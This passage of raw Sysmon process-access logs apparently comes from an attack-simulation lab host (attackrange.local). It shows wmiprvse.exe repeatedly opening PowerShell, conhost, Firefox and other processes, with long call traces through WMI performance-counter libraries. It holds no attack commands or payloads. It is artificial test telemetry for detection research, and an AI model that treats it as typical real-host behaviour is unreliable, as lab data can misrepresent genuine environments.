Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151093Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151092Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151091Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151090Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151089Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151088Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151087Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151086Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151085Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151084Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151083Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151082Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151081Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151080Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151079Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.533{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151078Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 